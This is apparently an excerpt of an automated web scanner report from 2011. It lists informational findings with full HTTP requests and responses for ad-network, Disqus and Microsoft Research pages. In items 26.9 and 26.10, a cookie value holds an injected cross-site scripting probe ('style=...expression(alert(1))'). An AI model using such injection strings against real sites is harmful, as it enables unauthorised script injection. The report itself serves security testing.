26.1. http://d3.zedo.com/jsc/d3/bh.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/bh.html

Request

GET /jsc/d3/bh.html?n=1389;g=20;a=3;s=1;t=r HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 25 Jul 2011 08:56:14 GMT
ETag: "2202a8c-43c-4a8e0fcc8c780"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1084
Cache-Control: max-age=135633
Expires: Mon, 05 Sep 2011 11:20:57 GMT
Date: Sat, 03 Sep 2011 21:40:24 GMT
Connection: close


<HTML>
<body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<SCRIPT LANGUAGE="JavaScript">
var
...[SNIP]...

26.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/vasco.com/p.json

Request

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

26.3. http://mediacdn.disqus.com/1314991730/build/system/def.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1314991730/build/system/def.html

Request

GET /1314991730/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 02 Sep 2011 19:38:26 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 27790
X-Varnish: 1952463179
Cache-Control: max-age=2528752
Expires: Sun, 02 Oct 2011 19:41:06 GMT
Date: Sat, 03 Sep 2011 13:15:14 GMT
Connection: close

<!DOCTYPE html>

<html>
<body>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//sigma.disqus.c
...[SNIP]...

26.4. http://mediacdn.disqus.com/1314991730/build/system/reply.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1314991730/build/system/reply.html

Request

GET /1314991730/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 02 Sep 2011 19:38:31 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 33094
X-Varnish: 1952453902
Cache-Control: max-age=2528840
Expires: Sun, 02 Oct 2011 19:42:34 GMT
Date: Sat, 03 Sep 2011 13:15:14 GMT
Connection: close

<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>

<style type="text/css">

...[SNIP]...

26.5. http://mediacdn.disqus.com/1314991730/build/system/upload.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1314991730/build/system/upload.html

Request

Response

26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=892&ref2=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&tzo=360&ms=988 HTTP/1.1
Host: now.eloqua.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: ELOQUA=GUID=19DDB6AE1941431A910441006951B164; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sat, 03 Sep 2011 14:44:03 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

26.7. https://onlineaanvraag.diginotar.nl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineaanvraag.diginotar.nl
Path:	/

Request

GET / HTTP/1.1
Host: onlineaanvraag.diginotar.nl
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vxf1nkmhlaurworuh4lsmves

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:25:46 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

26.8. http://research.microsoft.com/apps/dp/h.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/apps/dp/h.htm

Request

GET /apps/dp/h.htm? HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 29 Jun 2011 13:10:51 GMT
Accept-Ranges: bytes
ETag: "358793f85d36cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 12:57:56 GMT
Connection: close
Content-Length: 126

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Directory Page</title>
</head>
<body>
h
</body>
</html>

26.9. http://research.microsoft.com/en-us/um/people/chengh/measure.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/chengh/measure.html

Request

GET /en-us/um/people/chengh/measure.html HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/um/people/chengh/measurev2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 23:43:03 GMT
Accept-Ranges: bytes
ETag: "29d782dd92e8c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:05:51 GMT
Content-Length: 251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>AdMeasure<
...[SNIP]...

26.10. http://research.microsoft.com/en-us/um/people/chengh/measurev2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/chengh/measurev2.html

Request

GET /en-us/um/people/chengh/measurev2.html HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/research/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DCollaboration%252520Opportunities%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1010%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 13 Oct 2009 01:37:55 GMT
Accept-Ranges: bytes
ETag: "50a4b3c9a54bca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:05:51 GMT
Content-Length: 1913

<html>
<script language="javascript"><!--
var t=new function(){var j=this,f,b=""+Math.floor(Math.random()*2147483648)+""+Math.floor(Math.random()*2147483648),e=["","64.4.18.87","64.4.18.91","207.46.
...[SNIP]...

26.11. http://research.microsoft.com/en-us/um/people/darkok/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/darkok/

Request

GET /en-us/um/people/darkok/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 30 Oct 2007 18:13:57 GMT
Accept-Ranges: bytes
ETag: "da3657a3201bc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:16 GMT
Connection: close
Content-Length: 681

<html>

<head><title>Darko Kirovski</title>

<LINK REL="shortcut icon" HREF="http://research.microsoft.com/users/darkok/favicon.ico">

</head>

<script Language="JavaScript">
var width=800;

...[SNIP]...

26.12. http://research.microsoft.com/en-us/um/people/dbwilson/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/dbwilson/

Request

GET /en-us/um/people/dbwilson/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 31 Jan 2010 07:04:37 GMT
Accept-Ranges: bytes
ETag: "73c1aea643a2ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:14 GMT
Connection: close
Content-Length: 1113

<html>
<head>
<meta http-equiv="Refresh" content="0; url=http://dbwilson.com">
</head>
<body>
<p>My homepage is located at <a href="http://dbwilson.com" onClick="stc(this, 1)"><tt>http://dbwils
...[SNIP]...

26.13. http://research.microsoft.com/en-us/um/people/horvitz/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/horvitz/

Request

GET /en-us/um/people/horvitz/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.14. http://research.microsoft.com/en-us/um/people/lamport/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/lamport/

Request

GET /en-us/um/people/lamport/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 10 Feb 2010 09:46:17 GMT
Accept-Ranges: bytes
ETag: "09363e435aaca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:08 GMT
Connection: close
Content-Length: 1857

<HTML>
<HEAD>
<TITLE>Leslie Lamport's Home Page </TITLE>
</HEAD>
<BODY BGCOLOR=#fffff0>
<H1>LESLIE   LAMPORT'S   HOME   PAGE </H1>

<!-- http://jasonlamport.com/
...[SNIP]...

26.15. http://research.microsoft.com/en-us/um/people/livshits/papers/abstracts/usenixsec11b.abstract.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/abstracts/usenixsec11b.abstract.html

Request

GET /en-us/um/people/livshits/papers/abstracts/usenixsec11b.abstract.html HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 06 Aug 2011 20:28:49 GMT
Accept-Ranges: bytes
ETag: "ec41ed727754cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:30 GMT
Connection: close
Content-Length: 2126

<html>
<HEAD>
<LINK rel="STYLESHEET" href="../../default.css" type="text/css"/>
<TITLE>Fast and Precise Sanitizer Analysis With BEK</TITLE>
</HEAD>

<body>
<h2>Fast and Precise Sanitizer Ana
...[SNIP]...

26.16. http://research.microsoft.com/en-us/um/people/ratul/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/ratul/

Request

GET /en-us/um/people/ratul/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 25 Aug 2011 06:59:07 GMT
Accept-Ranges: bytes
ETag: "ac48807bf462cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:06 GMT
Connection: close
Content-Length: 12874

<html>

<head>
<title>Ratul Mahajan</title>

<body bgcolor=white lang=EN-US link=blue vlink=blue style='tab-interval:.5in'>

<div class=Section1>

<h1><span style='font-size:36.0pt'> </s
...[SNIP]...

26.17. http://research.microsoft.com/en-us/um/people/schramm/memorial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/schramm/memorial/

Request

GET /en-us/um/people/schramm/memorial/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 17 Mar 2009 00:11:58 GMT
Accept-Ranges: bytes
ETag: "feabccfc94a6c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:08 GMT
Connection: close
Content-Length: 17633

<HTML>
<HEAD>
<title>Oded Schramm Memorial</title>
<meta name="author" content="Oded Schramm">
</TITLE>
</HEAD>

<BODY bgcolor="#e3c9a6">

<!--#i
...[SNIP]...

26.18. http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/list.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/list.html

Request

GET /en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/list.html HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 08 Apr 2003 08:21:47 GMT
Accept-Ranges: bytes
ETag: "809f68e5a7fdc21:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:35 GMT
Connection: close
Content-Length: 53642

<title>The Haskell 98 Library Report: List Utilities</title>
<body bgcolor="#ffffff"> <i>The Haskell 98 Report</i><br> <a href="index.html">top</a> | <a href="array.html">back</a> | <a href="maybe.ht
...[SNIP]...

26.19. http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/standard-prelude.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/standard-prelude.html

Request

GET /en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/standard-prelude.html HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 08 Apr 2003 08:21:47 GMT
Accept-Ranges: bytes
ETag: "809f68e5a7fdc21:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:38 GMT
Connection: close
Content-Length: 125365

<title>The Haskell 98 Report: Standard Prelude</title>
<body bgcolor="#ffffff"> <i>The Haskell 98 Report</i><br> <a href="index.html">top</a> | <a href="io-13.html">back</a> | <a href="syntax-iso.htm
...[SNIP]...

26.20. http://research.microsoft.com/en-us/um/people/ssaponas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/ssaponas/

Request

GET /en-us/um/people/ssaponas/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.21. http://research.microsoft.com/en-us/um/people/yongrui/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/yongrui/

Request

GET /en-us/um/people/yongrui/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.22. http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/VMNetsrv.msi.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/VMNetsrv.msi.htm

Request

GET /en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/VMNetsrv.msi.htm HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 29 Mar 2011 00:50:52 GMT
Accept-Ranges: bytes
ETag: "9423af5aabedcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:13 GMT
Connection: close
Content-Length: 515890

<HEAD>
<TITLE>VMNetsrv.msi Source</TITLE>
<SCRIPT SRC='../../../../../../sourcecss.js'></SCRIPT>
</HEAD><BODY>
<SCRIPT>PrintHeader("src/drivers/net/packet/lib/i386/VMNetsrv.msi");</SCRIPT>
<DIV CLASS=
...[SNIP]...

26.23. http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi.htm

Request

GET /en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi.htm HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 29 Mar 2011 00:50:52 GMT
Accept-Ranges: bytes
ETag: "9439d65aabedcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:14 GMT
Connection: close
Content-Length: 480113

<HEAD>
<TITLE>VMNetSrv.msi Source</TITLE>
<SCRIPT SRC='../../../../../../../sourcecss.js'></SCRIPT>
</HEAD><BODY>
<SCRIPT>PrintHeader("src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi");</SCRIPT>
...[SNIP]...

26.24. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
